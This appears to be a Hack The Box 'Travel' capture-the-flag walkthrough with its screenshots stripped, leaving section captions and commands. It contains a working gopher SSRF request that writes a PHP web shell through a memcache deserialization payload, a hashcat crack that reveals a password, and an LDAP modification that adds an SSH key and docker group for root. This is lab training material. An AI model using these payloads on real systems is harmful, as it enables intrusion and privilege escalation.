Hack the Box: Travel

Travel

User

Recon

Main page
Blog subdomain
Awesome RSS
Blog-dev subdomain
Dumping .git repo
Repo content
README.md file

Foothold

Debug comment
Sending payload
Memcache write confirmation
A part of key
Memcache key
* copy rss_template.php & template.php to `wp-content/themes/twentytwenty`
../../uploads/payload.php
Gopherus memcache generation
  • Add 0 to address so it looks something like: 127.00.0.1
  • Encode path traversal dots in url (substitute them with %2E)
  • Change Spyd3r string to the Simplepie’s name of memcache entry: xct_4e5612ba079c530a6b1f148c0b352241
GET /awesome-rss/?debug=1&custom_feed_url=gopher://127.00.0.1:11211/_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%20443%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:20:%22%00TemplateHelper%00file%22%3Bs:28:%22%2E%2E/%2E%2E/%2E%2E/uploads/payload.php%22%3Bs:20:%22%00TemplateHelper%00data%22%3Bs:316:%22%3B%3Chtml%3E%3Cbody%3E%3Cform%20method%3D%22GET%22%20name%3D%22%3C%3Fphp%20echo%20basename%28%24_SERVER%5B%27PHP_SELF%27%5D%29%3B%20%3F%3E%22%3E%3Cinput%20type%3D%22TEXT%22%20name%3D%22cmd%22%20id%3D%22cmd%22%20size%3D%2280%22%3E%3Cinput%20type%3D%22SUBMIT%22%20value%3D%22Execute%22%3E%3C/form%3E%3Cpre%3E%3C%3Fphp%20%20%20%20if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%7Bsystem%28%24_GET%5B%27cmd%27%5D%29%3B%7D%3F%3E%3C/pre%3E%3C/body%3E%3Cscript%3Edocument.getElementById%28%22cmd%22%29.focus%28%29%3B%3C/script%3E%3C/html%3E%22%3B%7D%0d%0a HTTP/1.1Host: blog.travel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Webshell

User

Wordpress backup
Lynik-admin hash
# hashcat.exe -m400 -a0 hashes.txt rockyou.txt
-- snip --
$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser
User flag

Root

.ldaprc
hosts file
LDAP password
# ssh lynik-admin@travel.htb -D 1080
# proxychains4 ldapsearch -x -o ldif-wrap=no -h 172.20.0.10 -b "dc=travel,dc=htb" -D 'cn=lynik-admin,dc=travel,dc=htb' -W
-- snip --
# travel.htb
dn: dc=travel,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: Travel.HTB
dc: travel
--snip --
# linux, servers, travel.htb
dn: ou=linux,ou=servers,dc=travel,dc=htb
description: Linux Servers
objectClass: organizationalUnit
ou: linux
-- snip --
# jane, users, linux, servers, travel.htb
dn: uid=jane,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
uid: jane
uidNumber: 5005
homeDirectory: /home/jane
givenName: Jane
gidNumber: 5000
sn: Rodriguez
cn: Jane Rodriguez
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
loginShell: /bin/bash
-- snip --
$ cat /etc/group
root:x:0:
-- snip --
docker:x:117:
dn: uid=jane,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDKaHUB/NbqgaSrI6orQXxMcbdRnZ1EAzpRBYKp2x1of/DVCnSkyv2sOo5NxRa+g9mBf+PaqbyEanWtuMY2v0rrBr86Q9fHOvYA7S597ElikYf35uHlaq9iBdm4v/swijm4lZofQJT8atgUOv8dZbw2GSsxgjlSnUKeYH31bpVhmsIX660vALgxcN0FUsEuApX7NjycENldmGZ4bcD87IxTGXR6dLgcvMAaaokoMFZVKcuk8nABxvWlUol/Z5uPpQIMBJtPpre5ytxT2GXY3EKskGN/JHH9moV6z36ji2TLJFCVUBGqQrCWIgWq8bEjOpJ1B5507f0RalBUCPLU0yE2Uybhb8eJxbFd7dnDQnwYLwFUSR2YO5k+xFxFJKDReAC+ccSYEjZ/nFCI+E8b8P2xbuJA3Kkf2mpBitCLV6L1kP61oh3nJENT5kNVPscUPCxFUnnr1HN2yLQIbRfIB5sVtG5J3FSaA+SbEJ2CpTxTwJQ/ft7zF8Cjr9eqAIIiW1TNzPgYWRsE1HIXr3HVBA6eEyLpQLf6/dsoL6I/jFn1s03btvaunkX+8FmW8BNEnEIOxr5F/ZYhFAGooYjfXPa1mcdU2S7Cgg1VVZqsss0IF2ejuawILPAIf1Y7agIHEckSWdKEHZX2mINm1IyDBIZvO7CevbDT8aIL+zZa8zDjRw== tellico@htb
-
replace: gidNumber
gidNumber: 117
Access as Jane
List of docker images
Root flag

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Sitecore 10 certification Tips

Google Firebase and AWS amplify

How to use Azure Container Registry?

Creating a Hyperledger Fabric network from scratch — Part III Chaincode

2021–04–25 — Weekly Articles

Serverless computing in the cloud

How to be a Git master from scratch — Step by step instructions

How to be a Git master from scratch — Step by step instructions

Salesforce Integration Services: How Does it Work? | Codementor

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tellico Lungrevink

Tellico Lungrevink

More from Medium

Hack The Box — Previse

Hack the Box: ScriptKiddie

HackTheBox StartingPoint - Meow Walkthrough

Solving HariBahadur CTF